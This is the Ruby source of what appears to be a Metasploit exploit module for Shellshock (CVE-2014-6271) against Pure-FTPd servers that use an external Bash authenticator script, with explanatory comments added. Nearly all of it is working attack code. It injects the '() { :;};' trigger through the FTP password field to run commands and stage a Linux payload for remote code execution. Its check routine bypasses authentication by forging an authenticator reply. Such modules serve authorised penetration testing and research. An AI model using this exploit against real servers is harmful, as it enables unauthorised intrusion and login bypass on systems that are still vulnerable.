Path: blob/master/modules/exploits/multi/ftp/pureftpd_bash_env_exec.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Shellshock (CVE-2014-6271) reached through Pure-FTPd's external
# authentication hook (--with-extauth with a Bash authenticator script).
# No real credentials are ever used: every connection sends a random
# username and carries the Bash trigger in the PASS command, so each
# attempt — including #check — is visible in the server's authentication
# log (hence IOC_IN_LOGS in Notes).
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Ftp
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Pure-FTPd External Authentication Bash Environment Variable Code Injection (Shellshock)',
      'Description' => %q(
        This module exploits the Shellshock vulnerability, a flaw in how the Bash shell
        handles external environment variables. This module targets the Pure-FTPd FTP
        server when it has been compiled with the --with-extauth flag and an external
        Bash script is used for authentication. If the server is not set up this way,
        the exploit will fail, even if the version of Bash in use is vulnerable.
      ),
      'Author' =>
        [
          'Stephane Chazelas', # Vulnerability discovery
          'Frank Denis', # Discovery of Pure-FTPd attack vector
          'Spencer McIntyre' # Metasploit module
        ],
      'References' =>
        [
          [ 'CVE', '2014-6271' ],
          [ 'CWE', '94' ],
          [ 'OSVDB', '112004' ],
          [ 'EDB', '34765' ],
          [ 'URL', 'https://gist.github.com/jedisct1/88c62ee34e6fa92c31dc' ],
          [ 'URL', 'http://download.pureftpd.org/pub/pure-ftpd/doc/README.Authentication-Modules' ]
        ],
      'Payload' =>
        {
          'DisableNops' => true,
          'Space' => 2048
        },
      # Both targets stage the payload with the :printf CmdStager flavor;
      # they differ only in architecture.
      'Targets' =>
        [
          [ 'Linux x86',
            {
              'Platform' => 'linux',
              'Arch' => ARCH_X86,
              'CmdStagerFlavor' => :printf
            }
          ],
          [ 'Linux x86_64',
            {
              'Platform' => 'linux',
              'Arch' => ARCH_X64,
              'CmdStagerFlavor' => :printf
            }
          ]
        ],
      'DefaultOptions' =>
        {
          'PrependFork' => true
        },
      'DefaultTarget' => 0,
      'DisclosureDate' => '2014-09-24',
      'Notes' =>
        {
          'AKA' => [ 'Shellshock' ],
          'Stability' => [ CRASH_SAFE, ],
          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS, ],
          'Reliability' => [ REPEATABLE_SESSION, ],
        },
    ))
    register_options(
      [
        Opt::RPORT(21),
        # Absolute prefix for sh and chmod on the target; see #send_command
        # and #execute_command.
        OptString.new('RPATH', [true, 'Target PATH for binaries used by the CmdStager', '/bin'])
      ])
    # Credentials are not user-supplied: the username is random and the
    # password field is the injection vector, so the Ftp mixin's
    # FTPUSER/FTPPASS options are removed from the module.
    deregister_options('FTPUSER', 'FTPPASS')
  end

  # Active check: it performs two real login attempts rather than relying
  # on the banner alone.
  #
  # 1. The PASS value carries a script that prints a successful
  #    authenticator reply (auth_ok:1, uid/gid, dir, end). A 2xx response
  #    to a random username means the injected command was executed by the
  #    authenticator. A 2xx from a server whose banner is not Pure-FTPd is
  #    not treated as evidence and yields Safe.
  # 2. The PASS value then prints auth_ok:0; the login must be rejected
  #    with a 5xx "login authentication failed" — presumably to rule out a
  #    server that simply accepts any credentials.
  #
  # Returns CheckCode::Vulnerable only when both steps agree, otherwise
  # CheckCode::Safe. Both attempts appear in the FTP authentication log.
  def check
    # this check method tries to use the vulnerability to bypass the login
    username = rand_text_alphanumeric(rand(20) + 1)
    random_id = (rand(100) + 1)
    command = "echo auth_ok:1; echo uid:#{random_id}; echo gid:#{random_id}; echo dir:/tmp; echo end"
    if send_command(username, command) =~ /^2\d\d ok./i
      disconnect
      return CheckCode::Safe if banner !~ /pure-ftpd/i

      command = "echo auth_ok:0; echo end"
      if send_command(username, command) =~ /^5\d\d login authentication failed/i
        disconnect
        return CheckCode::Vulnerable
      end
    end
    disconnect

    CheckCode::Safe
  end

  # CmdStager callback: delivers one stager line through #send_command.
  #
  # The stager's bare `chmod` is rewritten to an absolute path under RPATH,
  # presumably because the authenticator's environment cannot be relied on
  # to provide a usable PATH. NOTE(review): gsub! edits the String the
  # stager passed in, not a copy. `_opts` is unused.
  def execute_command(cmd, _opts)
    cmd.gsub!('chmod', "#{datastore['RPATH']}/chmod")
    username = rand_text_alphanumeric(rand(20) + 1)
    send_command(username, cmd)
  end

  # Stages the payload via the CmdStager (lines capped at 500 characters,
  # each sent as its own FTP login attempt) and then starts the handler.
  def exploit
    execute_cmdstager(linemax: 500)
    handler
  end

  # One complete FTP round trip: connect, USER, PASS, disconnect.
  #
  # The password is the injection vector. It is prefixed with the Shellshock
  # trigger `() { :;};` so that when Pure-FTPd hands the credentials to the
  # external Bash authenticator through its environment (see the
  # README.Authentication-Modules reference), Bash evaluates the trailing
  # text and runs `cmd` under RPATH/sh. Always disconnects; returns the raw
  # reply to PASS so callers can match on the status code.
  def send_command(username, cmd)
    cmd = "() { :;}; #{datastore['RPATH']}/sh -c \"#{cmd}\""
    connect
    send_user(username)
    password_result = send_pass(cmd)
    disconnect
    password_result
  end
end